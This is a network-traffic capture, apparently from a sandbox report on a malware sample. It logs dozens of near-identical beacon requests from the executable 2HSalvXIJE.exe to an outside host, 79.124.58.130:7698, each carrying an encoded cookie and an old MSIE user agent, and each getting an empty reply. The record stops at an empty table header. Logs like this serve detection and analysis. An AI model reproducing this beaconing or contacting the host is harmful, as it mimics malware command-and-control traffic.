Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:54.290596008 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:55.194454908 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49726	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:55.310811996 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:56.198607922 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49727	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:56.333585024 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:57.433224916 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49728	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:57.555510044 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:58.444996119 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49729	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:58.900667906 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:59.800971031 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49730	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:59.914968014 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:00.814533949 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49731	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:00.934107065 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:01.824476957 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49732	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:01.962315083 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:02.853286028 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49733	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:02.993199110 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:03.881383896 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49734	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:04.008845091 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:04.894721985 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49735	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:05.009212017 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:05.900727034 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49736	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:06.024596930 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:06.911962032 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49737	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:07.024276972 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:08.179464102 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49738	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:08.306018114 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:09.247842073 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49739	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:09.368122101 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:10.255693913 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49740	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:10.452840090 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:11.324069023 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49741	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:11.456300974 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:12.358958960 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49742	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:12.484675884 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:13.360125065 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49743	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:13.477315903 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:14.356265068 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49744	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:14.477349997 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:15.357425928 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49745	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:15.602524042 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:16.494213104 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49746	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:16.622534990 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:17.505584955 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49747	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:17.634488106 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:18.522517920 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49748	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:18.711203098 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:19.570184946 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49749	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:19.696365118 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:20.597740889 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49750	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:20.712317944 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:21.601063013 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49751	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:21.743232965 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:22.639131069 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49752	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:22.759289980 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:23.660198927 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	49753	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:23.792592049 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:24.693700075 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	49754	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:24.805612087 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:25.699343920 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.8	49755	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
